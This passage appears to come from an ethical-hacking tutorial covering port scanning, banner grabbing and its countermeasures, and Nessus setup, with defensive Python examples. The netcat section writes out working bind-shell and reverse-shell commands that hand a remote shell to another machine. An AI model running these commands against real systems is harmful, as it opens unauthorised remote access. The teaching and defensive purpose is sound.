Protocol on 202.75.54.101:80/tcp matches http-iis

Unidentified ports: none.

amap v5.4 finished at 2014-03-27 00:46:17

A port range such as [75-85] can be given instead of a single port. The rules, options and the trigger/response files are described in the manual page (man amap) or with (amap --help).



NETCRAFT

Netcraft's site report (http://toolbar.netcraft.com/site_report?url=http://www.certifiedhacker.com) gathers hosting, DNS and server information about a site from Netcraft's own records, so nothing is sent to the target. The site report for www.certifiedhacker.com contained:

Background
  Site title: Certified Hacker
  Date first seen: December 2002
  Site rank: 63367
  Primary language: English
  Description: A brief description of this website or your business.
  Keywords: keywords, or phrases, associated, with each page, are best

Network
  Site: http://www.certifiedhacker.com
  Netblock owner: TM VADS DC Hosting
  Domain: certifiedhacker.com
  Nameserver: ns3.noyearlyfees.com
  IP address: 202.75.54.101
  DNS admin: hostmaster@noyearlyfees.com
  IPv6 address: Not Present
  Reverse DNS: ns1.noyearlyfees.com
  Domain registrar: tucows.com
  Nameserver organisation: whois.tucows.com
  Organisation: certifiedhacker.com, certifiedhacker.com, 92345, US
  Hosting company: myloca.com
  Top Level Domain: Commercial entities (.com)
  DNS Security Extensions: unknown
  Hosting country: MY

The hosting country, netblock owner and reverse DNS are the items most useful for the next steps, since they tell us where the server actually lives and who operates the address space.
NETCAT
Source: http://netcat.sourceforge.net

Netcat is described by its authors as the "TCP/IP Swiss army knife". It is a simple utility that reads and writes data across network connections using the TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or driven by other programs and scripts, and at the same time a feature-rich network debugging and exploration tool. Among its features:

- outbound or inbound connections, TCP or UDP, to or from any port
- a tunneling mode that allows special tunneling such as UDP to TCP
- full control over the connection parameters (source port/interface, listening port/interface, the address the connection binds to)
- a built-in port scanning capability, with a randomizer
- a buffered send mode (one line every N seconds) and hexdump (to stderr or to a file) of transmitted and received data

Note that the original Netcat does not support SSL; the Nmap project's reimplementation, Ncat (the ncat command), accepts the same basic options as nc and adds --ssl. Netcat is installed on most Linux distributions; if not, it is a package away (apt-get install netcat).

1- Port scanning with Netcat

Netcat can scan ports, although it is slower and far less capable than Nmap; it is handy when nothing else is installed. The scan below checks ports 75 to 80 on www.certifiedhacker.com:

: # nc -vv -z -w2 www.certifiedhacker.com 75-80
DNS fwd/rev mismatch: www.certifiedhacker.com != ns1.noyearlyfees.com
www.certifiedhacker.com [202.75.54.101] 80 (http) open
www.certifiedhacker.com [202.75.54.101] 79 (finger) : Connection timed out
www.certifiedhacker.com [202.75.54.101] 78 (?) : Connection timed out
www.certifiedhacker.com [202.75.54.101] 77 (rje) : Connection timed out
www.certifiedhacker.com [202.75.54.101] 76 (?) : Connection timed out
www.certifiedhacker.com [202.75.54.101] 75 (?) : Connection timed out
 sent 0, rcvd 0

The options used:

(-vv) turns on verbose mode, twice for more detail, so that the result of each connection attempt is printed.
(-w) sets the time out for connections and for the final network reads, here 2 seconds.
(-z) zero-I/O mode: only report whether the connection succeeds, which is what makes it a port scan.

Netcat tries the ports from the highest to the lowest. "Connection timed out" means no answer at all, so the port is filtered by a firewall; a closed port that answers with a RST is reported as "Connection refused". Further examples:

#nc -vv -w2 -z 202.75.54.101 1-100

#nc -vv -w2 -z 202.75.54.101 1-100 400-500
2- Connecting to TCP and UDP services

A plain TCP/UDP connection with Netcat is used in two cases: to read the banner a service sends on connection, and to talk to the service by hand with its own protocol. In the following example we connect to 202.75.54.101 on TCP port 21, the FTP service:

:~# nc -vn 202.75.54.101 21
(UNKNOWN) [202.75.54.101] 21 (ftp) open
220-Microsoft FTP Service
220 Welcome TO FTP Account

The [-n] option skips DNS resolution, which is why the host is shown as (UNKNOWN); the banner already identifies the FTP server. Press Ctrl+C to close the connection. In the next example we connect to the same host on TCP port 80, the HTTP service, and send a HEAD request to get the response headers without the HTML page:

# nc -vv -n 202.75.54.101 80
(UNKNOWN) [202.75.54.101] 80 (http) open
HEAD /HTTP/1.1

 sent 15, rcvd 0

Nothing came back (rcvd 0) because the request as typed is malformed: the request line must be "HEAD / HTTP/1.1" with a space before "HTTP", an HTTP/1.1 request needs a "Host:" header, and the headers have to be terminated by an empty line (press Enter twice). The Telnet example below shows the complete exchange with the server's answer.
3- Chatting between two machines over TCP or UDP

Netcat can act as a server or as a client, so two copies of it can relay text between two machines over a TCP (or UDP) connection. In the following example a Linux machine with the address 192.168.16.73 listens on port 6666 and a Windows machine with the address 192.168.16.72 connects to it. On Linux:

: # nc -vlp 6666
listening on [any] 6666 ...

On Windows:

C:\nc111nt>nc 192.168.16.73 6666

The options used:

(-v) verbose, so that connection events are printed.
(-l) listen mode, so that Netcat acts as a server.
(-p) the local port to listen on; here 6666 on all interfaces ([any]).

Once the Windows machine connects, the listener shows where the connection came from:

# nc -vlp 6666
listening on [any] 6666 ...
192.168.16.72: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.16.73] from (UNKNOWN) [192.168.16.72] 48039

(the inverse lookup failure only means there is no reverse DNS for 192.168.16.72). Now anything typed on one side appears on the other. Typing hello Ahmed, How are you? on the listener:

# nc -vlp 6666
listening on [any] 6666 ...
192.168.16.72: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.16.73] from (UNKNOWN) [192.168.16.72] 48039
hello Ahmed, How are you?

shows up on the Windows side:

C:\nc111nt>nc 192.168.16.73 6666
hello Ahmed, How are you?

and the same works in the other direction. This is the simplest complete use of Netcat: one end listens, the other connects, and standard input and output on both ends are joined through the socket.



4- Transferring files

Because Netcat joins standard input and output to the socket, redirecting them moves a file between two machines. The receiver listens and writes whatever arrives into a file:

: # nc -vlp 6666 > txt.txt
listening on [any] 6666 ...

The sender connects and feeds the file as its standard input:

C:\nc111nt>nc 192.168.16.73 6666 < txt.txt

The transfer ends when the sender reaches the end of the file; nothing is encrypted or verified, so it is a transfer for a trusted network or for an attacker pulling a file off a compromised host.
5- Remote administration with Netcat (Remote Administration with Netcat)

Netcat can be used as a backdoor. The most dangerous of its options is -e, which executes a program after the connection is established and attaches the program's standard input and output to the socket; with cmd.exe on Windows or /bin/bash on Linux this hands a command shell to whoever is at the other end. Two arrangements are possible, depending on which side can reach the other:

Bind shell (Bind shell)

In the bind shell the victim machine listens on a port and runs the shell for whoever connects. This requires that the victim be reachable from the attacker: it needs a routable, non-RFC 1918 address, or the attacker must be on the same network, or port forwarding must be configured on the NAT device in front of it. On the victim (a Linux system, so the shell is /bin/bash; on Windows it would be cmd.exe):

:~# nc -lvvp 4444 -e /bin/bash
listening on [any] 4444 ...

The -e option is what turns the listener into a shell server: every command that arrives over TCP port 4444 is executed by /bin/bash and its output is sent back. The attacker (here a Windows machine, which may well sit behind NAT, since it is the one connecting out) simply connects to that port and types commands:

C:\nc111nt>nc 192.168.16.73 4444
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:0d:a3:a4
          inet addr:192.168.16.73  Bcast:192.168.16.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe0d:a3a4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:670631 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5508253 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:719067241 (685.7 MiB)  TX bytes:251298974 (239.6 MiB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:18270 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18270 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1320770 (1.2 MiB)  TX bytes:1320770 (1.2 MiB)

Note that the ifconfig output is that of the victim (the Linux machine with 192.168.16.73), proving that the command ran there although it was typed on the Windows machine. No prompt is shown, because /bin/bash is not running on a terminal.
Reverse shell (Reverse shell)

In the reverse shell the roles are swapped: the attacker listens and the victim connects out and hands over its shell. This is the arrangement to use when the victim cannot be reached directly, typically because it has a private address behind NAT or a firewall blocks inbound connections while allowing outbound ones, which is the common case. The attacker (here the Windows machine 192.168.16.72) listens:

C:\>nc -vlp 6666

and the victim connects to it, giving it cmd.exe (or /bin/bash on Linux):

#nc -v 192.168.16.72 6666 -e cmd.exe

From then on the attacker's listener behaves exactly like the bind shell: commands typed there are executed on the victim and the output comes back over the same connection.
The most used Netcat options, as listed by nc -h:

-c cmd    run cmd through /bin/sh after the connection is made (like -e, but through the shell)
-e prog   program to execute after the connection is made (dangerous: gives a shell to the peer)
-h        show the help text with the list of options
-i secs   delay interval between lines sent and between ports scanned (useful with the port scanner)
-l        listen mode, for inbound connections (server mode)
-n        numeric-only IP addresses, no DNS lookup of domain names
-o file   write a hex dump of the traffic to file
-p port   local port number
-r        randomize the local and remote ports
-q secs   quit secs seconds after EOF on standard input
-s addr   local source address to send from
-t        answer TELNET negotiation, for talking to telnet servers
-u        UDP mode instead of TCP
-v        verbose output (use -vv for more)
-w secs   timeout for connections and for the final network reads
-z        zero-I/O mode, used for port scanning

Ncat, the Nmap project's Netcat, is invoked as ncat, accepts the same basic options as nc and adds SSL support, for example:

#ncat -v 192.168.16.72 6666 --ssl

TELNET

Telnet is a TCP/IP protocol and application used to connect to remote hosts; it is one of the oldest TCP/IP applications and is available on almost every system. Its original use is the remote terminal session: the Telnet client on the local host connects to the Telnet server (the Telnet daemon) on the remote host over TCP port 23, the server presents a login prompt, and from then on every command the user types is sent over the network, executed by the remote host, and its output is sent back to the client's screen, as if the user were sitting at the remote machine. Nothing is encrypted, which is why SSH replaced it for administration; but because the client simply sends and receives raw text over a TCP connection, it is also a convenient tool for talking to any text-based service by hand. Some uses of telnet:

1. Talking HTTP to a web server by hand, to see the raw headers and the source of a page; this is how telnet is used for banner grabbing, since the server's reply includes its identification.
2. Acting as an FTP client, like a simple gate FTP program, by typing the FTP commands directly to the server.
3. Reading POP mail by connecting to the POP server and issuing its commands; this only works with providers that offer POP access, not with web-only mail such as Yahoo or Hotmail.

Telnet has no special features beyond this; its advantage is that it is already there on nearly every machine.

Telnet and banner grabbing:

C:\>telnet www.certifiedhacker.com 80

On Windows, telnet can be started from Start > Run by typing telnet (on recent versions the Telnet Client feature has to be enabled first). Once connected to port 80, type:

GET / HTTP/1.1

followed by a blank line (press Enter twice), and the server responds:

HTTP/1.1 403 Forbidden
Content-Length: 213
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 11 Aug 2012 09:57:07 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>

Connection to host lost.

Even though the request was refused (403), the Server and X-Powered-By headers have identified the server software and its version, which is all the banner grabbing needs.
BANNER GRABBING COUNTERMEASURES (DISABLING OR CHANGING BANNERS)

Attackers use banner grabbing to learn the operating system, the server software and its version, and from that the vulnerabilities and missing security patches they can exploit. The countermeasures are therefore about not giving this information away:

- Disabling or changing banners: remove the version strings from the banners the services send.
- Display false banners to misguide attackers: make the server claim to be something it is not.
- Turn off unnecessary services on the network host to limit information disclosure: a service that does not run cannot be fingerprinted.

IIS users can use these tools to disable or change banner information:

1- IIS Lockdown Tool (http://microsoft.com)

2- ServerMask (http://www.port80software.com)

Apache 2.x with the mod_headers module: use a directive in the httpd.conf file to change the banner information:

Header set Server "New Server Name"

(this sets the Server header in the responses to the name given, hiding the real software and version). Alternatively, change the ServerSignature line to ServerSignature Off in the httpd.conf file, which removes the server version from the footer of error pages and directory listings. In practice Apache adds its own Server header after mod_headers has run, so "Header set Server" is often ineffective; ServerTokens Prod in httpd.conf reliably reduces the header to just "Apache", and rewriting it completely needs mod_security (SecServerSignature) or a change to the source. Whatever method is used, verify the result with the same telnet or netcat request an attacker would send.
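The check the last sentence asks for, as an added example that is not from the book: an HTTP banner grabber that sends a well-formed HEAD request (the form the netcat example above got wrong) and a function that lists the headers disclosing server technology, so the same code verifies whether a "Header set Server" or ServerMask change actually worked. `grab_http_banner` needs network access; the parsing and the disclosure check run offline on `SAMPLE_RESPONSE`, a constructed response that mirrors the headers ID Serve and telnet showed above, and `HARDENED_RESPONSE`, a constructed response from a server with the countermeasures applied. The header list in `DISCLOSING_HEADERS` is this example's own choice.

```python
# Added example (not from the book): an HTTP banner grabber and a check for
# the response headers that disclose server technology.  grab_http_banner
# needs the network; the parser and the check run offline on constructed
# responses that mirror the headers shown by ID Serve and telnet above.
import socket

# Headers a banner grabber reads; which ones matter is this example's choice.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")


def http_head_request(host: str, path: str = "/") -> bytes:
    """A complete HTTP/1.1 HEAD request.  The Host header and the blank line
    that ends the headers are both required; without them the server sends
    nothing back (the "sent 15, rcvd 0" seen with netcat above)."""
    return (f"HEAD {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def parse_head_response(raw: bytes):
    """Split a raw response into (status line, {lower-case header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def disclosed_technology(headers: dict) -> dict:
    """Return only the headers that identify the server software or framework;
    an empty dict means the banner countermeasures are in effect."""
    return {name: headers[name] for name in DISCLOSING_HEADERS if name in headers}


def grab_http_banner(host: str, port: int = 80, timeout: float = 5.0):
    """Live banner grab (needs network): connect, send HEAD, parse the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(http_head_request(host))
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_head_response(data)


# Constructed response, with the headers the page's target returned.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Server: Microsoft-IIS/6.0\r\n"
                   b"X-Powered-By: ASP.NET\r\n"
                   b"Date: Thu, 27 Mar 2014 04:12:17 GMT\r\n"
                   b"Connection: close\r\n\r\n")

# Constructed response from the same server after the banner was removed.
HARDENED_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                     b"Date: Thu, 27 Mar 2014 04:12:17 GMT\r\n"
                     b"Connection: close\r\n\r\n")


if __name__ == "__main__":
    for raw in (SAMPLE_RESPONSE, HARDENED_RESPONSE):
        status, headers = parse_head_response(raw)
        print(status, "->", disclosed_technology(headers) or "nothing disclosed")
```

Used against a live host (`grab_http_banner("www.example.com")`), the result is the same pair ID Serve displays, and an empty `disclosed_technology` result after changing httpd.conf is the confirmation that the directive took effect. Note that hiding the header does not stop active OS fingerprinting of the TCP/IP stack; it only removes the easiest source of version information.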
HIDING FILE EXTENSIONS FROM WEB PAGES

File extensions such as .asp, .php or .jsp in URLs reveal the web technology and the server behind a site, information an attacker uses to choose and launch attacks. Hiding the file extensions masks the web technology:

- IIS users can use tools such as PageXchanger to manage the file extensions.
- Apache users can use mod_negotiation directives, so that a request for /page is served from page.php without the extension ever appearing in the URL.
- Change the application mappings, for example serve .asp content under .htm or .foo, to disguise the identity of the servers.
- It is even better if file extensions are not used at all.

As with banners, this only removes an easy clue; the behaviour of the application (error messages, cookie names, default paths) can still give the technology away.


SCAN FOR VULNERABILITY aijtin o^fl 3.5 



By now we have a list of IP addresses, open ports and the services running on them; the next step is to check those systems for vulnerabilities.

A vulnerability is a weakness in a system or network that lets an attacker break in or gain access. Vulnerabilities usually come from missing patches (patches are the updates that vendors release to fix known security problems), from configuration errors, or from weaknesses in the applications that the services run. The most serious of these allow remote code execution, where the attacker runs code of his choice on the remote system without any local access; once that is possible, the attacker can steal or delete data, install key loggers or backdoors, and use the compromised machine to attack others.

Vulnerability scanning is the process of finding such weaknesses automatically, using a vulnerability scanner: a tool that probes the target and compares what it finds against a database of known vulnerabilities. Attackers use vulnerability scanners to find a way into a target; the same scanners are used by system administrators and penetration testers to find and fix the weaknesses in their own networks before they can be exploited.
Vulnerability scanning can find the vulnerabilities in:
VULNERABILITY SCANNING TOOL: NESSUS 

Nessus is a powerful vulnerability scanning tool (free for home use, paid for professional use). It can be downloaded from the following site:

http://www.tenable.com/products/nessus

Tenable Network Security is the company that produces Nessus. Nessus is available in two editions, Professional and Home. To use the Home edition you must register at http://nessus.org/register; the activation code needed to register your copy of Nessus is then sent to you.



Nessus is a program that scans a system for vulnerabilities (weaknesses) and reports them. The tool works in the following steps:

1- Data gathering
2- Define host
3- Port scan
4- Plug-in selection
5- Reporting of data

When the scan is given login credentials for the target, Nessus can read the Windows registry after logging in and determine the service pack level, the patch level, and the versions of Internet Explorer and other installed software. Nessus keeps a database of known vulnerabilities and a large set of checks; for each scan you select which checks to run and which authentication method to use against the target. The checks themselves are written in NASL (Nessus Attack Scripting Language), which also allows new tests to be written.
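As an added example, not from the original page or from Tenable, here is a parser for the .nessus v2 XML report that the reporting step produces; it summarises the findings by severity and by plugin family and lists the ones that need remediation. The embedded report is a constructed sample whose host, plugin IDs and CVE id are placeholders.

```python
"""Summarise a Nessus .nessus (v2 XML) report by severity and plugin family.

Added example, not from the original page or from Tenable: the 'Reporting of
data' step above ends with a report that can be exported as .nessus XML. This
parser reads that layout (ReportHost / HostProperties / ReportItem). The
report below is a constructed sample; its host, plugin IDs and CVE id are
placeholders.
"""
import xml.etree.ElementTree as ET
from collections import Counter

# Nessus severity values as used in the ReportItem 'severity' attribute.
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample report (placeholder IDs, not real plugin or CVE numbers).
SAMPLE_NESSUS = """<?xml version="1.0"?>
<NessusClientData_v2>
 <Report name="constructed-sample">
  <ReportHost name="192.0.2.10">
   <HostProperties>
    <tag name="host-ip">192.0.2.10</tag>
    <tag name="operating-system">Linux (constructed)</tag>
   </HostProperties>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
     pluginID="900001" pluginName="SSH Service Detection (placeholder)"
     pluginFamily="Service detection"/>
   <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
     pluginID="900002" pluginName="Web Server Version Disclosure (placeholder)"
     pluginFamily="Web Servers">
    <plugin_output>Server: Apache/2.2.22 (constructed)</plugin_output>
   </ReportItem>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="4"
     pluginID="900003" pluginName="Missing Security Update (placeholder)"
     pluginFamily="Debian Local Security Checks">
    <cve>CVE-0000-0000</cve>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return one dict per ReportItem across all hosts in the report."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        # HostProperties holds <tag name="...">value</tag> entries for the host.
        props = {t.get("name"): (t.text or "") for t in host.iter("tag")}
        for item in host.iter("ReportItem"):
            findings.append({
                "host": props.get("host-ip", host.get("name")),
                "os": props.get("operating-system", ""),
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "severity": int(item.get("severity", "0")),
                "plugin_id": item.get("pluginID", ""),
                "plugin_name": item.get("pluginName", ""),
                "family": item.get("pluginFamily", ""),
                "cves": [c.text for c in item.findall("cve") if c.text],
            })
    return findings


def severity_summary(findings):
    """Count findings per severity name, always listing all five levels."""
    counts = Counter(f["severity"] for f in findings)
    return {SEVERITY_NAMES[s]: counts.get(s, 0) for s in sorted(SEVERITY_NAMES)}


def family_summary(findings):
    """Count findings per plugin family (the families chosen in the policy)."""
    return dict(Counter(f["family"] for f in findings))


def actionable(findings, min_severity=2):
    """Findings at or above min_severity, most severe first, for remediation."""
    return sorted((f for f in findings if f["severity"] >= min_severity),
                  key=lambda f: (-f["severity"], f["host"], f["port"]))


if __name__ == "__main__":
    items = parse_nessus(SAMPLE_NESSUS)
    print(severity_summary(items))
    for f in actionable(items):
        print(SEVERITY_NAMES[f["severity"]], f["host"], f["port"], f["plugin_name"])
```

To use it on a real export, read the .nessus file into a string and pass it to parse_nessus.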
Nessus has the following features:

1- Each security test is a separate plug-in, so the set of tests can be updated without changing the scanner itself.
2- The tests are written in NASL, so new checks can be added without reading or changing the Nessus code.
3- Nessus uses a client/server architecture: the server performs the scans, while the client is used to configure the scans and to view the reports.



Nessus runs on Linux, Windows, OS X, FreeBSD and other systems.

Nessus works as a client/server system: the server (nessusd) does the scanning, and you connect to it from a browser. Installing Nessus for the first time takes a few steps, which are the same whether it is installed on Linux, OS X or Windows:

1. Download Nessus for your system from http://www.tenable.com/products/nessus.
2. Register for a HomeFeed (or Professional) activation code; the code is sent to your e-mail address.
3. Install the package with rpm or apt-get, or with the installation wizard, depending on your operating system.
4. Start the Nessus service and connect to it from a browser.
5. Enter the HomeFeed (or Professional) activation code.
6. Wait while Nessus downloads and processes the plugins.



When installed with the wizard on Windows, Nessus places its files in the following directories:

Nessus Home Directory (Windows): \Program Files\Tenable\Nessus

Nessus Sub-Directory              Purpose
\conf                             Configuration files
\data                             Stylesheet templates
\nessus\plugins                   Nessus plugins
\nessus\users\<username>\kbs      User knowledgebase saved on disk
\nessus\logs                      Nessus log files

When the installation wizard finishes, Nessus opens its welcome page in the browser. Click the "here" link to connect to the Nessus interface over SSL:

[Screenshot: "Welcome to Nessus! Please connect via SSL by clicking here. You are likely to get a security alert from your web browser saying that the SSL certificate is invalid. You may either choose to temporarily accept the risk, or you can obtain a valid SSL certificate from a registrar. Please refer to the Nessus documentation for more information."]
Because the Nessus server uses a self-signed certificate, Firefox shows an "Untrusted Connection" page. Click "I Understand the Risks" and then "Add Exception":

[Screenshot: Firefox "This Connection is Untrusted" page for https://localhost:8834. "You have asked Firefox to connect securely to localhost:8834, but we can't confirm that your connection is secure." Buttons: "Get me out of here!", "Technical Details", "I Understand the Risks", "Add Exception"]



After clicking Add Exception, click Confirm Security Exception:

[Screenshot: Firefox "Add Security Exception" dialog for Location: https://localhost:8834/. Certificate Status: "This site attempts to identify itself with invalid information." Wrong Site: "Certificate belongs to a different site, which could indicate an identity theft." Unknown Identity: "Certificate is not trusted, because it hasn't been verified by a recognized authority using a secure signature." "Permanently store this exception" is checked. Buttons: "Confirm Security Exception", "Cancel"]



Click Get started:

[Screenshot: "Welcome to Nessus 5. Thank you for installing Nessus, the world leader in vulnerability scanners. Nessus will allow you to perform: high-speed vulnerability discovery, to determine which hosts are running which services; agentless auditing, to make sure no host on your network is missing security patches; compliance checks, to verify and prove that every host on your network adheres to the security policy you defined; scan scheduling, to automatically run scans at the frequency you select; and more. During the next steps, we are going to create an administrative account and register your scanner with a Plugin Feed, which we will download." Button: Get started]



The Nessus setup wizard then goes through the following screens; fill in each one and click Next. The first screen creates the admin user for the scanner:

[Screenshot: "Initial Account Setup. First, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/delete users, stop ongoing scans, and change the scanner configuration." Fields: Login: janateba, Password, Confirm Password. "Because the admin user can change the scanner configuration, the admin has the ability to execute commands on the remote host. Therefore, it should be considered that the admin user has the same privileges as the "root" (or administrator) user on the remote host." Buttons: < Prev, Next >]

Nessus then asks for the activation code. If you have not already obtained one, get it from:
http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation

After obtaining the activation code, enter it in the Plugin Feed Registration page and click Next:

[Screenshot: https://localhost:8834/register/ "Plugin Feed Registration. As information about new vulnerabilities is discovered and released into the public domain, Tenable's research staff designs programs ("plugins") that enable Nessus to detect their presence. The plugins contain vulnerability information, the algorithm to test for the presence of the security issue, and a set of remediation actions. Enter your Activation Code below to subscribe to a "Plugin Feed"." Field: "Please enter your Activation Code: xxxx-xxxx-xxxx-xxxx-xxxx". Notes: Tenable SecurityCenter users enter 'SecurityCenter' in the field above; to perform offline plugin updates, enter 'offline' in the field above. Optional Proxy Settings. Buttons: < Prev, Next >]

Next: Download Plugins




[Screenshot: https://localhost:8834/register/ "Registering... Successfully registered the scanner with Tenable. Successfully created the user." Button: Next: Download plugins >]
Nessus then downloads the newest plugin set, which takes a few minutes depending on the speed of your internet connection, and then initializes; finally the login page appears:

[Screenshot: https://localhost:8834/downloading/ "Nessus is fetching the newest plugin set. Please wait... The Nessus server is now downloading the newest plugins from Tenable which may take some time as we're testing for a lot of stuff. Then, the Nessus server will start processing the plugins, which is CPU / disk intensive and, therefore, takes a lot of time; this is all part of the installation process. Once the plugins are downloaded and processed, subsequent startups will be much faster." The page also links to the Documentation, Discussion Forums, Nessus Video Tutorials, Support Portal, Tenable Blog, Tenable SecurityCenter, the Tenable Podcast and Twitter.]

[Screenshot: https://localhost:8834/loading/ "Nessus is initializing. Please wait..."]

[Screenshot: https://localhost:8834/html5.html#/ Nessus login page, with the username janateba, the password field and a "Remember Me" check box]
Enter the username and password created during installation and click Sign In. The main Nessus interface appears as follows:

[Screenshot: Nessus / Scans page at localhost:8834/html5.html#/scans, with the folders My Scans, Trash, All Scans, New Folder, an Upload button, and the message "No scans have been generated for this account. You can add a scan by clicking the "New Scan" button."]



Nessus can also be installed on Linux from the terminal. If the package is available in the distribution's repositories, use [apt-get install nessus]; otherwise download the .deb package from the Nessus site and install it with [dpkg -i name_of_.deb_file_to_install], as in the following example:

:~/Desktop# dpkg -i Nessus-5.2.6-debian6_i386.deb
Selecting previously unselected package nessus.
(Reading database ... 231873 files and directories currently installed.)
Unpacking nessus (from Nessus-5.2.6-debian6_i386.deb) ...
Setting up nessus (5.2.6) ...

nessusd (Nessus) 5.2.6 [build N25116] for Linux
Copyright (C) 1998 - 2014 Tenable Network Security, Inc

Processing the Nessus plugins...

[##################################################]
All plugins loaded

- You can start nessusd by typing /etc/init.d/nessusd start

- Then go to https://jana:8834/ to configure your scanner

:~/Desktop#



Next, add a Nessus user with the following command:
/opt/nessus/sbin/nessus-adduser

Running 'nessus-adduser' asks for the username and password, whether the user should be a Nessus 'admin' user, and an optional set of rules restricting which hosts the user may scan. The following output shows a user being added to Nessus:

:~/Desktop# /opt/nessus/sbin/nessus-adduser
Login : noreen
Login password :
Login password (again) :

Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...)

(y/n) [n] : y
User rules

nessusd has a rules system which allows you to restrict the hosts
that noreen has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)



Then register the activation code and fetch the plugins:
/opt/nessus/bin/nessus-fetch --register your_reg_key

Replace "your_reg_key" with the activation code obtained from Tenable. Nessus then downloads the newest plugin set:

:~/Desktop# /opt/nessus/bin/nessus-fetch --register FD24-68C4-DQ59-392D-633C
Your Activation Code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...

After the download completes, start the Nessus service with the following command:

/etc/init.d/nessusd start

If the browser shows [Unable to Connect] when you open the Nessus page, the service is not running; start it (or restart it) with [/etc/init.d/nessusd start] and try again.
Plugins are the checks that Nessus runs against a target, and they are the heart of Nessus. The plugin feed is a database of checks for known vulnerabilities, which Nessus keeps up to date by downloading new plugins from Tenable. The plugins are stored on the Nessus server and are selected when a scan policy is created.

To use Nessus, open the browser and go to https://127.0.0.1:8834 (replace 127.0.0.1 with the address of the machine running the Nessus server if it is not the local machine; 8834 is the default port of the Nessus web interface). Note the 'https' in the URL: the Nessus interface is only reachable over SSL, and since the certificate is self-signed the browser will warn that the connection is untrusted, so add a security exception as described above. Then log in with the username and password created earlier.

The Nessus interface is divided into the following sections: results, scans, templates, policies, users and configuration. Before starting a scan you need a policy, either one of the built-in ones or one you create.

A policy defines the settings of a scan: which plugins run, whether safe checks are used, whether the scan runs online or offline, the credentials to use, and so on. Safe checks stop Nessus from running tests that could crash or disrupt the target service, which is the setting to keep for scanning a production network. To create a policy, click 'policies' and then 'New Policy', choose the default settings or adjust them to your needs, and save the policy under the name you want.



[Screenshot: Nessus / Policies page at https://localhost:8834/html5.html#/policies, with the tabs Scans, Schedules, Policies, Users, an Upload button, and the message "No policies have been created. You can add new policies by clicking the "New Policy" button."]



Clicking New Policy shows the policy wizards, which configure the common settings of a scan for you, next to the Advanced Policy option, which lets you set every option yourself:

[Screenshot: Nessus Policy Wizards page, listing wizard templates such as a basic open-ports scan, Web Application Tests, Windows Malware Scan and Mobile Device Scan, next to Advanced Policy]
In an Advanced Policy, Setting Type offers Basic, Port Scanning, Performance and Advanced settings, each shown on its own page; the policy also has General settings, Credentials, Plugins and Preferences pages. Fill in the ones you need and save the policy under a name of your choice.

Once the policy is saved, go to the 'scans' section and click 'New Scan' at the top right of the screen to set up the scan:



[Screenshot: Nessus / Scans page at https://localhost:8834/html5.html#/scans, with the tabs Scans, Schedules, Policies, Users, the folders My Scans, Trash, All Scans, New Folder, an Upload button, and the message "No scans have been generated for this account. You can add a scan by clicking the "New Scan" button."]



The New Scan / Basic Settings screen appears:

[Screenshot: New Scan / Basic Settings at https://localhost:8834/html5.html#/scans/new, with the pages Basic Settings, Schedule Settings and Email Settings, and the fields Policy, Folder (My Scans), Targets (www.certifiedhacker.com) and Upload Targets]



Before launching the scan, give it a name, choose the policy to use, and enter the targets in the Targets box: IP addresses, address ranges or host names, one per line. A file of targets can also be uploaded with Add File. Then click Launch: Nessus starts the scan and shows its progress.

When the scan finishes, Nessus shows the results under 'results'. For each host there is a list of the vulnerabilities found, colored by severity (critical, high, medium, low and informational), with the details of each finding and the remediation advised. A scan can take some time depending on the policy, the number of plugins selected and the number of targets.

EXAMPLES OF USING NESSUS

1- Using Nessus to scan for vulnerabilities on your own (Ubuntu) machine: as explained above, select the following plugin families in the policy:

- Ubuntu Local Security Checks
- Default Unix Accounts

2- Using Nessus to scan for vulnerabilities on the network: as explained above, select the following plugin families in the policy:

- CISCO
- DNS
